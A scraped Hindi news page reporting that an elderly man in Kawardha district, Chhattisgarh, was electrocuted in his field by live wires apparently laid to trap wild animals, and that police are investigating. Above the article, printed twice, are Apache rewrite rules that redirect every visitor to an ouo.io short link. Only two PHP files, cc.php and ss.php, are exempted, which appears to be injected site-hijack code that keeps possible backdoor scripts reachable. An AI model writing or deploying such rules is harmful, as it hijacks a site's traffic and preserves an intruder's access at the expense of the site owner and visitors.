
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 385
Previous Nextकवर्धा। छत्तीसगढ़ में कवर्धा जिले के वनांचल में कल रात एक बुजुर्ग की करंट की चपेट में आने से मौत हो गई। आपको बता दें कि यह घटना उस समय घटी जब बुजुर्ग खेत में काम कर रहा था। तभी अचानक बिजली की तार के चपेट में आ गया, जिससे उसकी तत्काल मौत हो गई। मामला जिले के चिल्फी थानाक्षेत्र के ग्राम धवईपानी का है। दरअसल, धवईपानी ग्राम के रहने वाला बुजुर्ग बजारी सिंह बैगा अपने खेत में काम कर रहा था। तभी वह बिजली प्रभावित एलटी तार की चपेट में आ गया।
जानकारी के मुताबिक वन्य प्राणियों को फंसाने के लिए यह करंट के तार बिछाए गए हैं, ताकि उन्हें आसानी से जाल में फंसाया जा सके। हालांकि इस वन्य प्राणी तो नहीं, लेकिन इस करंट की संपर्क में एक बुजुर्ग जरूर आ गया। फिलहाल, सूचना मिलने पर मौके पर पहुंची पुलिस ने शव का पंचनामा कर पोस्टमार्टम कराने के बाद शव को उसके घरवालों को सौंप दिया है। वहीं खेत में बिछाए करंट प्रभावित तार के मामले में चिल्फी पुलिस मामले की विवेचना में लगी है।